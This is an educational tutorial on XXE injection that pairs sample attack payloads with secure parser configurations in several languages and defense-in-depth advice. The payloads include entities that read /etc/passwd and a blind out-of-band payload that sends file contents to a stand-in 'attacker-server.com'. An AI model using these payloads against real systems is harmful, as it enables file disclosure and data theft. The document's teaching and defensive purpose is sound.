XML External Entity (XXE) Injection Demo

Understanding XXE Vulnerabilities

1. What is XML External Entity Injection?

XXE vulnerabilities occur when XML parsers process external entity references within XML documents. XML external entities allow XML documents to include content from external sources. If an application parses XML input from untrusted sources without disabling external entities, attackers can exploit this to:

Read sensitive files on the application server
Perform server-side request forgery (SSRF)
Scan internal networks
Execute denial of service attacks
In some rare cases, achieve remote code execution

2. How XXE Attacks Work

Attacker crafts malicious XML → Application parses XML with a vulnerable parser → Parser processes external entities → Sensitive data exposure

3. Common XXE Attack Vectors

Attack Type	Description	Impact
Classic File Disclosure	Using external entities to read local files	Disclosure of sensitive files like /etc/passwd, configuration files, etc.
Blind XXE	The application's response does not include the entity's content	Data exfiltration through out-of-band channels
SSRF via XXE	Using XXE to make requests to internal services	Access to internal systems, service enumeration
Denial of Service	Using nested entity expansion (e.g. "billion laughs") or large file inclusion	Server resource exhaustion, application outage

4. XML External Entities Explained

XML documents can define entities using the Document Type Definition (DTD):

<!DOCTYPE example [
    <!ENTITY myEntity "some value">
]>
<example>&myEntity;</example>

External entities reference content from outside the document:

<!DOCTYPE example [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<example>&xxe;</example>
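
As a rough illustration of the difference between the two entity kinds, the sketch below feeds both documents to Python's standard-library xml.etree.ElementTree parser. The helper name parse_text is made up for this example. ElementTree expands internal entities but does not resolve external ones and raises ParseError when it meets such a reference; other parsers and configurations behave differently.

```python
import xml.etree.ElementTree as ET

INTERNAL = """<!DOCTYPE example [
    <!ENTITY myEntity "some value">
]>
<example>&myEntity;</example>"""

EXTERNAL = """<!DOCTYPE example [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<example>&xxe;</example>"""


def parse_text(xml_text):
    """Return the root element's text, or None if the parser rejects the document."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError:
        return None


# The internal entity is expanded in place.
internal_result = parse_text(INTERNAL)
# The external entity is not resolved; ElementTree refuses the reference.
external_result = parse_text(EXTERNAL)
```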

XXE Injection Demonstrations

File Read XXE Attack

This demonstration shows how an attacker can read local files on the server using XXE injection.

How File Read XXE Works:

This attack exploits XML parsers that process external entity references to read files from the server's filesystem.

The attack works by injecting a DOCTYPE declaration containing an external entity that references a file, then using that entity in the XML document.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<library>
    <book>
        <title>&xxe;</title>
        <author>Malicious User</author>
        <year>2023</year>
        <category>Hacking</category>
    </book>
</library>

When the XML parser processes this document, it will:

Parse the DOCTYPE declaration
Process the external entity definition
Read the contents of the specified file (/etc/passwd)
Replace the &xxe; reference with the file contents
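
The four steps above can be sketched with Python's low-level expat bindings. This is a simulation under stated assumptions, not a real exploit: FAKE_FILES is a hypothetical in-memory stand-in for the server's filesystem, and parse_with_entity_resolution is an illustrative name. The handler does what a vulnerable parser configuration does implicitly: it resolves the system identifier and parses the result in place of the reference.

```python
import xml.parsers.expat

# Hypothetical stand-in for the server's filesystem, so no real file is read.
FAKE_FILES = {"file:///etc/passwd": b"root:x:0:0:root:/root:/bin/bash"}


def parse_with_entity_resolution(xml_text):
    """Collect all character data, resolving external entities from FAKE_FILES."""
    chunks = []
    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append

    def resolve_external_entity(context, base, system_id, public_id):
        # Steps 3 and 4: fetch the referenced content and parse it in place
        # of the &xxe; reference. The child parser inherits the handlers.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(FAKE_FILES.get(system_id, b""), True)
        return 1  # a non-zero value tells expat the entity was handled

    parser.ExternalEntityRefHandler = resolve_external_entity
    # Steps 1 and 2: expat reads the DOCTYPE and records the entity definition.
    parser.Parse(xml_text, True)
    return "".join(chunks)


PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<library>
    <book>
        <title>&xxe;</title>
    </book>
</library>"""

leaked = parse_with_entity_resolution(PAYLOAD)
```

Without the ExternalEntityRefHandler assignment, expat skips the reference, which is the behavior a hardened configuration aims for.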

Blind XXE Attack

This demonstrates blind XXE, where the response doesn't directly include the file contents but the attacker can still exfiltrate data.

How Blind XXE Works:

In blind XXE attacks, the application doesn't return the content of the external entity in its response. Attackers must use out-of-band techniques to exfiltrate data:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://attacker-server.com/evil.dtd">
    %dtd;
]>
<user>
    <name>John Doe</name>
    <email>john.doe@example.com</email>
    <role>&send;</role>
    <bio>Software developer with 5 years experience.</bio>
</user>

The evil.dtd hosted on the attacker's server contains:

<!ENTITY % all "
    <!ENTITY send SYSTEM 'http://attacker-server.com/collect?data=%file;'>
">
%all;

This attack works by:

Declaring the %file parameter entity, which loads the contents of the sensitive file
Loading a malicious DTD from the attacker's server through the %dtd parameter entity
Having the malicious DTD define an entity (&send;) whose system identifier is a URL on the attacker's server
Referencing &send; in the document, so the parser requests that URL with the file contents in the data query parameter
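
On the defensive side, the same structure can be inspected without resolving anything. The following is a minimal sketch, assuming Python's expat bindings with their default settings (parameter entities are not fetched); list_external_entities is a hypothetical helper name. It reports every entity declaration that carries a system identifier, which is what both %file and %dtd do in the payload above.

```python
import xml.parsers.expat


def list_external_entities(xml_text):
    """Return (name, is_parameter_entity, system_id) for each external entity declared."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # External entities have a system identifier and no literal value.
        if system_id is not None:
            found.append((name, bool(is_parameter), system_id))

    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed input: keep whatever declarations were seen so far
    return found


BLIND_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://attacker-server.com/evil.dtd">
    %dtd;
]>
<user>
    <name>John Doe</name>
    <role>&send;</role>
</user>"""

declarations = list_external_entities(BLIND_PAYLOAD)
```

A non-empty result on input that should never declare entities is a reasonable signal to reject or log the document.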

XXE Prevention Techniques

This section demonstrates how to properly configure XML parsers to prevent XXE vulnerabilities.

// Vulnerable Java XML parsing
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(new InputSource(new StringReader(xmlInput)));

// Secure Java XML parsing
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Disable DTDs completely
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Or, if DTDs are needed:
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(new InputSource(new StringReader(xmlInput)));

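// Vulnerable PHP XML parsing
// LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads external DTDs
$dom = new DOMDocument();
$dom->loadXML($xmlInput, LIBXML_NOENT | LIBXML_DTDLOAD);

// Secure PHP XML parsing
// Method 1 (PHP < 8.0): disable the external entity loader
// libxml_disable_entity_loader() is deprecated as of PHP 8.0
libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xmlInput);

// Method 2 (PHP 8.0+): external entity loading is disabled by default,
// so do not pass LIBXML_NOENT or LIBXML_DTDLOAD
$dom = new DOMDocument();
$dom->loadXML($xmlInput, LIBXML_NONET); // LIBXML_NONET blocks network access while loading

// Method 3: Using XMLReader, again without LIBXML_NOENT or LIBXML_DTDLOAD
$reader = new XMLReader();
$reader->xml($xmlInput, NULL, LIBXML_NONET);
while ($reader->read()) {
    // Process XML safely
}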

// Vulnerable C# XML parsing
XmlDocument doc = new XmlDocument();
doc.LoadXml(xmlInput);

// Secure C# XML parsing
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null; // Prevents XXE
doc.LoadXml(xmlInput);

// Or using XmlReader
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(new StringReader(xmlInput), settings);

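# Vulnerable Python XML parsing (xml.dom.minidom does not fetch external entities,
# but with Expat versions before 2.4.1 it is exposed to entity expansion attacks)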
from xml.dom.minidom import parseString
doc = parseString(xml_input)

# Secure Python XML parsing
from defusedxml.minidom import parseString
doc = parseString(xml_input)

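# Or with lxml
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
# Pass bytes: lxml rejects str input that carries an encoding declaration
doc = etree.fromstring(xml_input.encode("utf-8"), parser)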

// Vulnerable Node.js XML parsing (libxmljs with entity substitution enabled)
const libxmljs = require('libxmljs');
const xmlDoc = libxmljs.parseXml(xmlInput, {
    noent: true // substitutes entities, including external ones
});

// Safer Node.js XML parsing with xml2js
// xml2js is built on the sax parser, which does not load external entities
const xml2js = require('xml2js');
const parser = new xml2js.Parser();
parser.parseString(xmlInput, function(err, result) {
    // Process result
});

// Or using libxmljs with entity substitution and DTD loading left off
const libxmljs = require('libxmljs');
const xmlDoc = libxmljs.parseXml(xmlInput, {
    noent: false,
    dtdload: false,
    dtdvalid: false
});

Best Practices for XXE Prevention:

Disable External Entities - Configure XML parsers to disable DTD processing and external entity resolution
Use Safe Libraries - Use security-focused libraries like defusedxml for Python
Validate and Sanitize - Implement proper input validation on all XML data
Use Alternatives - Consider using JSON instead of XML where possible
Apply Least Privilege - Run your application with minimal file system permissions
Implement WAF Rules - Use web application firewalls to detect and block XXE attack patterns
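
The first practice, disabling DTD processing, can be approximated even where a parser offers no such switch. The sketch below is one possible approach using only the Python standard library, similar in spirit to what defusedxml does when DTDs are forbidden. The names DoctypeForbidden and parse_without_dtd are invented for this example.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def parse_without_dtd(xml_text):
    """Parse XML into an Element, rejecting any document that declares a DOCTYPE."""
    guard = xml.parsers.expat.ParserCreate()

    def reject(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE declaration not allowed: {name}")

    guard.StartDoctypeDeclHandler = reject
    guard.Parse(xml_text, True)     # first pass: only looks for a DOCTYPE
    return ET.fromstring(xml_text)  # second pass: builds the tree
```

Parsing twice costs some time; the trade-off is that entity definitions never reach the tree-building parser at all.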

Real-world XXE Scenarios

This section demonstrates how XXE vulnerabilities appear in common application features.

Document Upload/Import Scenario

Many applications allow users to upload or import documents in XML format, such as:

Office documents (DOCX, XLSX, etc. which are ZIP files containing XML)
Data migration files
Configuration files
Content management systems

If the application processes these XML files without proper security controls, XXE vulnerabilities can be exploited.

Exploit Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<document>
    <title>Malicious Document</title>
    <author>Attacker</author>
    <department>Hacking</department>
    <content>&xxe;</content>
</document>

Exploitation Details - Document Upload:

In a document upload scenario, attackers can exploit XXE vulnerabilities by:

Creating a malicious XML document with external entity references
Uploading the document through the application's import feature
Waiting for the server to process the XML, at which point the parser reads sensitive files or makes server-side requests on the attacker's behalf

This is particularly dangerous in business applications that process various document formats based on XML, such as DOCX, XLSX, etc.
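
Because these formats are ZIP archives of XML parts, an upload handler can check each part before any document library parses it. The following is a minimal sketch under that assumption; has_doctype and xml_parts_with_doctype are hypothetical helper names, and the file-extension filter is a simplification. A production check would also cap member sizes to guard against ZIP bombs.

```python
import io
import xml.parsers.expat
import zipfile


def has_doctype(xml_bytes):
    """Return True if the XML part declares a DOCTYPE."""
    found = []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = lambda *args: found.append(True)
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed part: report only what was seen before the error
    return bool(found)


def xml_parts_with_doctype(archive_bytes):
    """List the XML members of a ZIP-based document that contain a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            # Reads the whole member into memory; acceptable for a sketch only.
            if name.endswith((".xml", ".rels")) and has_doctype(archive.read(name)):
                flagged.append(name)
    return flagged
```

Legitimate Office documents normally contain no DOCTYPE declarations, so any flagged part is a reason to reject the upload.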

Comprehensive XXE Prevention Strategy

1. Defense-in-Depth Approach

Implement multiple layers of protection to ensure that if one defense fails, others will still protect your application:

Parser-level Protections - Disable external entities in XML parsers
Input Validation - Validate and sanitize all XML input
Access Controls - Run applications with minimal privileges
Network Controls - Use firewalls to restrict outbound connections
Monitoring - Implement logging and alerting for suspicious XML processing

2. XML Parser Configuration by Language

// Java - JAXP DocumentBuilderFactory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Completely disable DTDs
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

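// PHP
libxml_disable_entity_loader(true); // For PHP < 8.0 (deprecated in 8.0)
// In PHP 8.0+, external entity loading is disabled by default; do not pass LIBXML_NOENT, and add LIBXML_NONET to block network access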

// .NET
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

# Python - Use defusedxml library
from defusedxml import ElementTree
tree = ElementTree.parse(xml_file)

// Node.js - xml2js (its sax-based parser does not load external entities)
const parser = new xml2js.Parser();

3. Alternative Data Formats

When possible, avoid XML processing entirely by using alternative data formats:

JSON - Doesn't support external entity references
YAML - But be careful with YAML deserialization vulnerabilities
Protocol Buffers - Google's language-neutral, platform-neutral data format
MessagePack - Fast, small binary format

// Instead of XML, use JSON:
{
  "user": {
    "name": "John Doe",
    "email": "john.doe@example.com",
    "role": "user"
  }
}
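
To illustrate why JSON sidesteps the problem, the short sketch below parses a similar document with Python's standard json module. The "&xxe;" value is an assumption added for the demonstration; a JSON parser has no entity mechanism, so the string comes back untouched.

```python
import json

# An entity-style reference is just ordinary text to a JSON parser.
document = '{"user": {"name": "John Doe", "email": "john.doe@example.com", "role": "&xxe;"}}'

user = json.loads(document)["user"]
role = user["role"]  # the literal string "&xxe;", nothing is resolved
```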

4. Use XML Sanitization and Validation Libraries

Employ specialized security libraries to process XML safely:

OWASP XML Security Project
Python's defusedxml
Java's ESAPI XML Validator

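// OWASP Enterprise Security API (ESAPI) example
import org.owasp.esapi.ESAPI;

// encodeForXML escapes untrusted data before it is placed inside an XML document.
// It does not make an untrusted XML document safe to parse; parser hardening is still required.
String safeValue = ESAPI.encoder().encodeForXML(untrustedValue);
String xml = "<name>" + safeValue + "</name>";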

5. Security Testing

Regularly test your application for XXE vulnerabilities:

Include XXE tests in your security testing processes
Use automated scanning tools like OWASP ZAP, Burp Suite, or specialized XXE scanners
Conduct manual penetration testing focusing on XML processing
Review code that handles XML processing as part of security code reviews
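
One way to include XXE tests in an automated suite is a canary check: write a unique marker to a temporary file, reference that file from an external entity, and assert that the marker never shows up in the parser's output. The sketch below assumes the code under test can be wrapped as a function taking XML text and returning text; leaks_canary, safe_parse, and the CANARY value are illustrative names, not part of any existing tool.

```python
import pathlib
import tempfile
import xml.etree.ElementTree as ET

CANARY = "XXE-CANARY-7f3a"


def leaks_canary(parse_to_text):
    """Return True if parse_to_text exposes a local file via an external entity."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "secret.txt"
        secret.write_text(CANARY)
        payload = (
            '<?xml version="1.0"?>'
            f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{secret.as_uri()}">]>'
            "<r>&xxe;</r>"
        )
        try:
            return CANARY in parse_to_text(payload)
        except Exception:
            return False  # the parser rejected the document, so nothing leaked


def safe_parse(xml_text):
    """Example parser under test: ElementTree refuses external entity references."""
    return "".join(ET.fromstring(xml_text).itertext())
```

In a test suite this would typically appear as an assertion such as `assert not leaks_canary(safe_parse)`, with one case per XML entry point in the application.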

6. Implement WAF Rules

Configure Web Application Firewall (WAF) rules to detect and block common XXE attack patterns:

Block requests containing DOCTYPE declarations when not needed
Block external entity references in incoming XML
Monitor for suspicious outbound connections that could indicate successful XXE
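
Pattern-based blocking has limits worth knowing before relying on it. The sketch below models a naive byte-level DOCTYPE check (naive_waf_blocks is a made-up name, not a real WAF API) and shows that the same payload encoded as UTF-16, which XML parsers accept, no longer matches. This is why WAF rules are listed as one layer among several rather than a replacement for parser hardening.

```python
import re

# A simplistic byte-level signature, similar to a basic WAF pattern.
DOCTYPE_PATTERN = re.compile(rb"<!DOCTYPE")


def naive_waf_blocks(body: bytes) -> bool:
    """Return True if the request body matches the DOCTYPE signature."""
    return DOCTYPE_PATTERN.search(body) is not None


payload = '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>'

utf8_blocked = naive_waf_blocks(payload.encode("utf-8"))
# UTF-16 interleaves zero bytes, so the ASCII signature no longer appears.
utf16_blocked = naive_waf_blocks(payload.encode("utf-16"))
```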

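# Example ModSecurity WAF rule to block DOCTYPE declarations
# (the rule id and message are illustrative placeholders)
SecRule REQUEST_BODY "@rx <!DOCTYPE" "id:100001,phase:2,deny,status:403,msg:'DOCTYPE declaration in request body'"
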
7. Keep Software Updated

Ensure you're using the latest versions of XML parsers and libraries:

Older versions of XML parsers often have insecure defaults
Security patches for XML libraries should be applied promptly
Use dependency scanning tools to identify vulnerable XML processing libraries

8. Data Flow Monitoring

Monitor XML data flows within your application:

Track where XML enters your application and how it's processed
Implement anomaly detection for unusual XML documents or processing patterns
Set up alerts for unexpected server-side requests that might indicate XXE exploitation

9. Documentation and Training

Educate developers about XXE vulnerabilities:

Document secure XML processing practices within your organization
Provide training on XXE vulnerabilities and prevention techniques
Include XML security in developer onboarding and security awareness programs
Create code review checklists that specifically address XML processing security